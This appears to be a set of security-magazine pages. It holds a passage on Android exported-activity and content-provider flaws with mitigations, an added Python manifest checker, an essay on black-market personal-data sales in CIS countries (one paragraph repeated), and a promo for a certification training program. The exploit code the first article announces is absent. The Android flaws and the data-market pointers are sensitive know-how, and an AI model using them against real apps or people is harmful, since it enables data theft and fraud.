There are a number of apps that deal with sensitive data, and they will have root detection enabled. Such apps cannot be used on rooted devices. A few examples of this type of app are banking, financial and sensitive-data-handling apps, like PII-processing applications such as Google Pay: it cannot even be opened on devices that have been rooted. If losing access to such useful apps is a big deal, you might not want to root your phone.

Has rooting become so much harder than it used to be?
In the past few versions of Android, we have noticed that gaining root access on most devices is much harder than it once was. A couple of years back, some exploits could root most Android devices in a couple of steps, but such exploits are rare to find nowadays. The last such exploit was Towelroot, released in mid 2014, and Google was very quick to patch it up.

Some vulnerabilities and their possible exploits

1. Exported components in the AndroidManifest file, like Activity

We can write an exploit application to execute an activity of a vulnerable application. The only prerequisite to this would be exported=true set for that particular activity in the manifest file. A way of invoking another application's activities is to write an exploit app and feed it with the name of the package and activity to be launched. The following is a code to launch an activity "com.isi.testapp.Welcome". In our case, the exploit app doesn't require any permission to launch the "Welcome" activity of the vulnerable app.

Mitigation

Setting the android:exported attribute's value to false

In the AndroidManifest.xml file of our application, we should add the following attribute to the application component to be secured. In this scenario, com.isi.testapp.Welcome is the activity to be secured. The android:exported property of the activity restricts other applications or any system component other than the current app from accessing this Activity. Only applications that have the same user id (or UID) as the current app will be able to access this Activity.

2. Content Provider Leakage

There are certain cases where content providers are not implemented with the intent of sharing data with other applications, or the developer may want to give access only to those apps that have the proper permissions. In this case, proper security controls should be set for the application; otherwise, it would lead to leakage of information. The SMS application in Android devices is an example of content providers.
Any other application can query the inbox from the device using its URI content://sms/inbox. The READ_SMS permission must be declared in the application's AndroidManifest.xml file in order to access the SMS app's data.

Mitigation

Setting the android:exported attribute's value to false:

In the AndroidManifest.xml file of our application, we should add the following attribute to the content provider to be secured. In our case, com.isi.contentprovider.MyProvider is the content provider. If a content provider whose android:exported value is set to false is fetched using the query command, it will throw an exception.

Safeguarding mobile applications

• The application components should not be set with the export value true
• The application logs should not be world-readable
• The application code should be obfuscated
• The application should have SSL pinning
• Apply the Principle of Least Privilege
• No sensitive data should be stored on the client side

Conclusion

With the ever-changing scenario of mobile OSs, the limitations on rooting and jailbreaking will lead to mobile exploit applications becoming more significant. While these apps sit on an end user's device they help steal data (say, by reading application logs), make the vulnerable app unusable (logical DoS), bypass authentication and gain access (invoking an exported activity) and at times farm clicks (tapjacking). Mobile exploit application development will be the next big thing, and there are people taking up such things already. There are a couple of online courses specifically for mobile exploit application development. I would suggest being careful; don't install applications from untrusted sources, check the permissions required by the application, and avoid rooting or jailbreaking devices (unless absolutely necessary).
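Both mitigations above (android:exported="false" on the Welcome activity and on MyProvider) can be checked mechanically before an app ships. The following is an added example in Python, not code from the article: it parses an AndroidManifest.xml, applies the platform's export rule, and lists every component that another app can reach without holding a permission. The manifest is constructed sample input; com.isi.testapp.Welcome and com.isi.contentprovider.MyProvider are the names used in the article, while the other component, authority and permission names are assumptions.

```python
"""Static check of an AndroidManifest.xml for components other apps can reach.

Added example (not the article's code) for the two mitigations above: an
activity or content provider is only safe from other apps when it is not
exported, or when it is exported behind an android:permission.  The
manifest below is constructed sample input: com.isi.testapp.Welcome and
com.isi.contentprovider.MyProvider come from the article, the other
component, authority and permission names are assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.isi.testapp">
  <application>
    <!-- Vulnerable: any app can launch it, no permission required -->
    <activity android:name="com.isi.testapp.Welcome"
        android:exported="true" />
    <!-- Exported implicitly by its intent-filter; a launcher must be -->
    <activity android:name="com.isi.testapp.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <!-- Vulnerable: provider readable by any app (information leakage) -->
    <provider android:name="com.isi.contentprovider.MyProvider"
        android:authorities="com.isi.contentprovider"
        android:exported="true" />
    <!-- Hardened: the article's mitigation, android:exported="false" -->
    <provider android:name="com.isi.contentprovider.PrivateProvider"
        android:authorities="com.isi.contentprovider.private"
        android:exported="false" />
    <!-- Exported on purpose, but gated by a custom permission -->
    <activity android:name="com.isi.testapp.Share" android:exported="true"
        android:permission="com.isi.testapp.permission.SHARE" />
  </application>
</manifest>
"""


def android_attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Apply the platform default: an explicit android:exported wins;
    otherwise a component with an intent-filter is exported and one
    without is private (the pre-API-31 default; newer targets require
    an explicit value whenever an intent-filter is present)."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    return component.find("intent-filter") is not None


def find_unprotected_components(manifest_xml):
    """Return (tag, name) for every activity, service, receiver or provider
    that another app can reach without holding any permission.  The
    launcher activity is skipped because it has to be exported."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if not is_exported(comp) or android_attr(comp, "permission"):
                continue
            if any(android_attr(c, "name") == "android.intent.category.LAUNCHER"
                   for c in comp.iter("category")):
                continue
            findings.append((tag, android_attr(comp, "name")))
    return findings


if __name__ == "__main__":
    for tag, name in find_unprotected_components(SAMPLE_MANIFEST):
        print(f"{tag} {name}: exported without a permission; set "
              f'android:exported="false" or add android:permission')
```

On the sample manifest the check reports only the Welcome activity and MyProvider; the provider with android:exported="false" and the activity gated by a custom permission pass, which is exactly the state the two mitigations leave the manifest in.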
Black-Hats: How They Are Collecting Personal Data in the CIS Countries
Vlad Martin

Vlad Martin is a Security Specialist who holds an MSc in Finance and Banking. His favourite security areas are Biometrical Physical Access, Multi-Factor Authentication, Social Engineering, and Security Architecture.

Imagine a system administrator working in a middle-sized company whose details were bought by a hacker from some random country. Because this hacker has his/her data (passport, call detailing, SMS detailing, etc.), the attacker could easily hack this administrator (well, not that easily if he isn't qualified enough) and gain access to his/her computer, then simply install a usual keylogger, and that's it. Well, if it doesn't sound convenient enough for you, imagine the system administrator being blackmailed over their SMS messages or phone calls, and since he/she is scared that their data will be made public, he/she gives them access to the server, and that's it. I mean, of course, these scenarios may sound a little bit unrealistic, but from my experience, this is possible.

Introduction

If you live in the EU, you feel that your personal data is protected.
Of course it is, or most of it is, thanks to the GDPR: each company or public office is strictly controlled by different government authorities (such as the Personal Data Protection Office in Poland or The Office for Personal Data Protection in the Czech Republic), and some companies have already been fined, for instance in the latest Marriott case ($123 million fine) or the British Airways case ($230 million fine). Hence, this is how it has to be done when they deal with our personal data. But when it comes to our neighbors from the CIS countries, people usually are not aware of how it works there, and I think it needs to be explained.

Firstly, when it comes to personal data protection, each of these countries has its own regulations. However, these regulations are seemingly ineffective since the countries' borders are almost as thin as they are in the Schengen zone, and so the data can be transferred from one country to another easily.

Secondly, nobody cares. People are literally saying, "I have nothing to hide," and that's probably the biggest mistake they are making. In my opinion, this is the reason why the current situation with data protection is that bad. When people hear about hackers, most of them instantly think about "Russian hackers", of course because of the widespread news of high-profile cases (US elections, mass data breaches, etc.), but nobody is questioning how and why.

There was a big information security case last year in Russia. An SEO specialist, Pavel Medvedev, discovered that a lot of big companies from the CIS region hadn't secured their databases adequately, and because of that, all of the databases were indexed by Yandex. People were able to find other people's passport scans, plane or rail tickets, Sberbank payment information, and many other sensitive data just by simply searching for it.
The funniest thing, though, is that even after this breach, no one got fined. It is no secret that personal data is treated like garbage. I mean, whole printed databases are being thrown out like trash; it even comes to the point that you can just go to the nearest garbage dump and get yourself a great passport database, thanks to big companies like "Svyaznoy" or "Euroset". (Sources in Russian: https://pikabu.ru/story/svyaznoy_berezhet_vashi_personalnyie_dannyie_6849399 and https://omsk.mk.ru/social/2018/08/17/dokumenty-s-personalnymi-dannymi-omichey-vybrosili-na-ulicu.html)

CIS Countries Data Theft

I already made a short review of this case earlier (https://www.linkedin.com/pulse/cis-countries-data-theft-vlad-martin/), but it needs more explanation. Let's imagine we're black-hat hackers trying to find all the info about somebody. Besides, is there even a way to get personal data without hacking or phishing? We don't want to use social engineering and retrieve the data from somebody (because we are smart enough to understand that each call could be easily recorded and/or traced). Hence, how should we go about this? The Russian Internet! Currently, there's a large data market on the Russian Internet. You don't need to go to the DarkNet to buy yourself a large database: for example, if you Google "Buy Data Forum" (in Russian, of course), the first link you'll get will be one of the biggest forums (ox****ck.com) offering a lot of databases and services: credit/debit card details, passport details, military ID, location tracking (in real time or geolocation history), hacked social network accounts, call detailing.
If we speak about services, you can easily buy yourself (or for someone you know) a new passport, a new credit card (registered to another person, of course), military ID, driver ID, SMS detailing, sometimes even citizenship, and all these documents will be real and officially registered (if the deal is done with the help of their "guarantor"). And it's not only about this black market. There are tons of resources which are used for identification purposes, like "whose car this is", "to whom this mobile number belongs", etc., and most of them are free and easy to find. Paid resources, of course, contain much more personal data.

What about other countries?

This is not only about CIS citizens: you may find databases for almost all countries, including EU countries. Your data is being sold on forums like the aforementioned, and it is not just a myth, it's a reality. According to BBC News, I think it's quite alarming. Despite the regulations, each country's citizens' personal data could easily be sold to some criminal. As I mentioned in my last article, when I was previously working in a few firms, I had experience with (legally operating, by the way) companies specializing in data collection. Officially, of course, they said that they are using only public sources to collect the data they sell. But since I knew a few people working there, they disclosed that all this data is being bought from other countries. Sources? Public offices, mobile network operators, internet providers, etc. From what I saw (when they offered to sell us data for marketing purposes), it was filled with personal data; I mean, the data comprised passport details, addresses, mobile phones, place of work, and other information which shouldn't be shared at all.

How can Black-Hats use this data?
Imagine a system administrator working in a middle-sized company whose details were bought by a hacker from some random country. Because this hacker has his/her data (passport, call detailing, SMS detailing, etc.), the attacker could easily hack this administrator (well, not that easily if he isn't qualified enough) and gain access to his/her computer, then simply install a usual keylogger, and that's it. Well, if it doesn't sound convenient enough for you, imagine the system administrator being blackmailed over their SMS messages or phone calls, and since he/she is scared that their data will be made public, he/she gives them access to the server, and that's it. I mean, of course, these scenarios may sound a little bit unrealistic, but from my experience, this is possible.

It doesn't mean someone has to be hacked or blackmailed. In CIS countries, you can get a loan from some small banks by simply presenting someone's passport and tax ID. Or someone seeking to destroy a competitor's company could do it more easily by having their details, geolocation history, SMS detailing, and other data. By getting your card details, a person can withdraw your money. Since I'm an ardent foe of ads and marketing, I find it appalling to use this data for marketing purposes.

Conclusion

Nowadays, there's no personal data protection system at all, and it doesn't seem that there will be a positive trend. It's easy to collect CIS citizens' personal data and almost as easy to buy your sensitive info. In my opinion, this is one of the reasons why we hear so much about the "Russian hackers". Just be careful when you're entering personal data somewhere: it could easily be used against you, even if you're an EU citizen.
How StandardUser is Working with Practitioners and Universities to Close the Talent Gap

Kent Potter

Kent Potter is COO and Partner at StandardUser Cyber Security and a senior strategist and transformation executive with operations experience in North America, Europe, and Asia. Kent leads complex investigations and coordinates multi-disciplinary strategic initiatives for clients in both the private and public sector. Kent holds two software patents (#10264270 and #9936205), and led the development and sale of 19 patents.

David Evenden

David Evenden is an experienced offensive security operator/analyst with 10 years of active work experience inside the Intelligence Community (IC). During his time inside the IC, he learned Persian Farsi, worked at the NSA Red Team and was a member of an elite international team operating in conjunction with coalition forces to aid in the ongoing efforts in the Middle East. While he currently works with an ISP and DHS to aid in the efforts to enhance the bidirectional sharing relationship between the US Government and commercial entities, his passion is educating network administrators and security engineers on best practices when securing their network. David currently holds Pentest+ and CySA certificates.

Since we started in 2015, our team members have been on the front line of the cyber security industry from both an offensive and defensive position. Identifying the necessary skills, experience, and knowledge required to perform many of the most critical cyber security roles can be difficult for hiring managers and often impossible for recruiting teams. In response to this difficulty, we developed the Collegiate Cybersecurity Education Program (C2EP) to bridge the education and experience gap so that professionals can be poised for success in the field faster than ever before.
Training aspiring hackers in the theory and practice of information security is an absolute requirement. The demand for highly skilled, competent cyber security professionals has never been greater. Markets and industries throughout the world are demanding new tools and applications to streamline work processes, improve educational systems, create efficiencies within governments, and satisfy our insatiable need for on-demand content in our personal lives. These advancements bring with them risks unlike anything we have ever experienced. Companies and individuals alike are vulnerable to nefarious actors, and they are often completely unaware.

C2EP is designed to be taught on university campuses to aspiring and current IT practitioners, preparing them for highly sought-after certifications in the industry. All C2EP courses are led by regional information security practitioners who work at nearby cyber firms, allowing students to learn firsthand how the skills they are learning can be utilized in the market today. For instance, an aspiring pentester currently working as an engineer will learn the fundamentals and methodologies of penetration testing in the Pentest+ course.
The C2EP model is built on one-week training courses that prepare students for a wide range of certifications, focusing right now on the Net+, Sec+, CySA+, and Pentest+ exams. These courses run parallel to a student's existing class schedule and do not interfere with their regular studies. The premise of the program is to quickly and effectively prepare students to pass their certification exams so that when they graduate they not only have a degree but also industry-recognized certifications. Additionally, professionals within the industry who are looking to advance their careers are quickly able to acquire the necessary knowledge and skills to achieve their certifications. The ability to combine current students with working professionals creates a unique learning environment that benefits everyone.

The course material is based on four corresponding study guides that we developed, with the help of the community, in order to effectively communicate the core elements covered by the exams, a lab environment to test new skills, and real-world experience gained in the field. This Pentest+ book is an example of the guides we use in the course. Our instructors, who are active practitioners, lead discussions that delve further into each training element, and participants gain insights into how their new technical skills can be applied in the work environment.

Our goal with C2EP is to empower students and professionals by equipping them with the necessary skills and certifications to advance their careers and address the most challenging issues facing companies today. Some of these challenges range from Business Continuity and Asset Management to Threat Analytics and Penetration Testing.
C2EP partner campuses provide the classroom setting and work closely with us in identifying the course instructor. In partnership with StandardUser, Friends University in Kansas provides a state-of-the-art cyber lab that ensures all course activities are executed in a controlled environment without requiring any additional staff or resources from host campuses. Sean Cash, the Assistant Chair of the Division of Business Information and Technology, said: "Friends University understands that education comes in many forms, and to close the gap in the information security labor market, we're offering a certified professional training program in the region's only Cyber Security Attack Range built by Metova, Inc. that will help businesses identify skilled infosec practitioners ready to enter the workplace." - Sean Cash, Asst Professor of Business Management.